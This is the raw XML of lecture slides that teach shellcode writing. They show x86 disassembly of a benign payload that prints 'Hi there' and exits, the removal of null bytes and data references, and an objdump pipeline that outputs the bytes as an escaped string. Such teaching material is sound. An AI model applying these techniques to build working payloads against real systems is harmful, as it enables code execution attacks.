              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>c0              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048062:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048064:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>c9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048066:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>d2              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048068:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>b0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>04              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>$0x4,%al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 804806a:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>b3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>01              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>$0x1,%bl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 804806c:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>b2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>08              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>$0x8,%dl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 804806e:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>68 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>68 65 72 65     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x65726568</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048073:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>68 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>48 69 20 74     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x74206948</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048078:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>89 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>e1              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F70991"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 804807a:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 804807c:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>b0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>01              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>$0x1,%al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 804807e:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048080:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37809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Fix: Stack Reference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smtClean="0"/>
              <a:t>External data reference needs to be removed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Put the data into code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And from the code into the stack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0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Shellcode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“Arbitrary Code Execution”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Upload our own code!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Execute a “Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>” (like bash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Also called “payload”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234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Fixed Shellcode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55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Problems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Now we have: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>No null bytes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>No external dependencies!</a:t>
            </a:r>
          </a:p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802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Memory Layout (Old, with data reference)</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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80592" y="831095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0592" y="4647519"/>
            <a:ext cx="2808312" cy="1224136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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80592" y="1047119"/>
            <a:ext cx="2808312" cy="797705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="rnd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80592" y="2733917"/>
            <a:ext cx="2808312" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="rnd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70991"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Rounded MT Bold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data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rgbClr val="F7099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4928" y="4630512"/>
            <a:ext cx="590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8048080:  b8 04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$0x4,%eax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8048085:  bb 01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$0x1,%ebx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804808a:  b9 a4 90 04 08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$0x80490a4,%ecx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804808f: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09 00 00 00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$0x9,%edx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8048094:  cd 80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0x80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04928" y="4647519"/>
            <a:ext cx="5601072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7751" y="2800399"/>
            <a:ext cx="3523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0991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Hi there”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>48 69 20 74 68 65 72 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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8621" y="1510815"/>
            <a:ext cx="221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0x80490a4</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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304928" y="2754018"/>
            <a:ext cx="3456384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26" name="Elbow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="7591604" y="3547323"/>
            <a:ext cx="1879739" cy="1339999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17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7523836" y="2433228"/>
            <a:ext cx="1181863" cy="506587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4088904" y="2754018"/>
            <a:ext cx="216024" cy="314942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4088904" y="3277452"/>
            <a:ext cx="216024" cy="768944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>
            <a:off x="4088904" y="4657865"/>
            <a:ext cx="216024" cy="150460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4088904" y="5006731"/>
            <a:ext cx="216024" cy="943513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1283505" y="4808325"/>
            <a:ext cx="2805399" cy="198406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80592" y="3068960"/>
            <a:ext cx="2805399" cy="198406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F70991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Memory Layout (New, stack reference)</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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80592" y="818519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3505" y="5131738"/>
            <a:ext cx="2808312" cy="1105574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100"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83505" y="3212976"/>
            <a:ext cx="2808312" cy="1008112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3810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 Rounded MT Bold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data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6856" y="4687010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CH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804806e:  68 68 65 72 65   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 $0x65726568</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH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8048073:  68 48 69 20 74   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 $0x74206948</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH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8048078:  89 e1            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1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de-CH" sz="1800" b="1" dirty="0" err="1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de-CH" sz="1800" b="1" dirty="0" err="1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de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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04928" y="4674237"/>
            <a:ext cx="5601072" cy="936103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97791" y="1832330"/>
            <a:ext cx="3523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0991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Hi there”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>48 69 20 74 68 65 72 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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64968" y="1785949"/>
            <a:ext cx="3456384" cy="1306432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4091817" y="1785949"/>
            <a:ext cx="573152" cy="455587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 flipV="1">
            <a:off x="4081232" y="2439165"/>
            <a:ext cx="583738" cy="639162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>
            <a:off x="4091817" y="4674237"/>
            <a:ext cx="213111" cy="588878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4091817" y="5461521"/>
            <a:ext cx="213112" cy="156816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1272323" y="5263115"/>
            <a:ext cx="2805399" cy="198406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80592" y="1047119"/>
            <a:ext cx="2808312" cy="1392046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="rnd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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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283296" y="2241536"/>
            <a:ext cx="2805399" cy="198406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F70991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output of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –d to C-like string:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>-d print2 </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> "^ " </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>cut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> -d$'\t' -f 2 </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>  | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> '\n' ' ' </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> -e 's/ *$//' </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> -e 's/ \+/\\x/g' </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> '{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> "\\x"$0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>}'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wow, my command-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is off the charts!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de-CH" dirty="0" smtClean="0"/>
              <a:t>\x31\xc0\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>\x31\xc9\x31\xd2\xb0\x04\xb3\x01\xb2\x08\x68\x68\x65\x72\x65\x68\x48\x69\x20\x74\x89\xe1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t>\x80\xb0\x01\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
